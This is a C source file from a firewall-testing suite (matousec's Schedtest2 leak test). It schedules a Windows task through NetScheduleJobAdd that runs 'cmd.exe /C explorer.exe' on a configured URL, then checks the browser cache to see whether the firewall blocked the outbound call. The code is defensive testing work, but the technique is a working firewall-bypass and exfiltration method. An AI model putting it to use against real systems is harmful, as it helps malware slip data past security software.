/*

 Security Software Testing Suite - Schedtest2 (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * Based on the idea of Wallbreaker - 4th test, written by Guillaume Kaddouch, http://www.firewallleaktester.com/.


 Method description:

   * The technique is almost the same as the technique described in "wallbreaker4.c".
     The only exception is that this test uses NetScheduleJobAdd API to schedule a task directly
     rather then using "at.exe".

*/

#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#include <lm.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"


int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  COM_CONF conf;
  if (!com_console_init_winmain("Schedtest2","schedtest2",lpCmdLine,&conf,COM_TEST_TYPE_SCHEDTEST2)) return 1;

  char *used_dlls[]={"netapi32.dll"};
  if (!com_hook_load_libraries(used_dlls,1)) return 1;

  com_uri_replace_eq(&conf);
  DeleteUrlCacheEntry(conf.uri);


  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  SYSTEMTIME local_time;
  GetLocalTime(&local_time);
  if (com_verbosity_get()) printf("Local time is %.2d:%.2d:%.2d %.2d/%.2d/%.4d.\n",local_time.wHour,local_time.wMinute,
                                  local_time.wSecond,local_time.wDay,local_time.wMonth,local_time.wYear);

  FILETIME file_time;
  if (SystemTimeToFileTime(&local_time,&file_time))
  {
    ULARGE_INTEGER li={{file_time.dwLowDateTime,file_time.dwHighDateTime}};
    li.QuadPart+=61*10*1000*1000;         // 61 sec
    file_time.dwLowDateTime=li.LowPart;
    file_time.dwHighDateTime=li.HighPart;

    if (FileTimeToSystemTime(&file_time,&local_time))
    {
      wchar_t cmdlinew[MAX_PATH+COM_INET_URI_MAX_LEN];
      snwprintf(cmdlinew,sizeof(cmdlinew)/sizeof(wchar_t),L"cmd.exe /C explorer.exe %S",conf.uri);
      cmdlinew[sizeof(cmdlinew)/sizeof(wchar_t)-1]=L'\0';

      if (com_verbosity_get()) printf("Command line \"%S\" will be executed at %.2d:%.2d.\n",
                                      cmdlinew,local_time.wHour,local_time.wMinute);

      AT_INFO atinf;
      memset(&atinf,0,sizeof(atinf));

      atinf.JobTime=local_time.wHour*60*60*1000+local_time.wMinute*60*1000+local_time.wSecond*1000;
      atinf.Command=cmdlinew;

      DWORD job_id;
      NET_API_STATUS status=NetScheduleJobAdd(NULL,(BYTE *)&atinf,&job_id);
      if (status==NERR_Success)
      {
        if (com_verbosity_get()) printf("New task (ID %ld) has been scheduled.\n",job_id);

        char buffer[4096];
        res=com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,70000,&err_inf)
         && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);

        NetScheduleJobDel(NULL,job_id,job_id);
      } else com_err_set_sc(&err_inf,status,"Unable to schedule a new task.\n");
    } else com_err_set(&err_inf,"Unable to convert file time to local time.\n");
  } else com_err_set(&err_inf,"Unable to convert local time to file time.\n");

  return com_end(res,&err_inf,&conf);
}
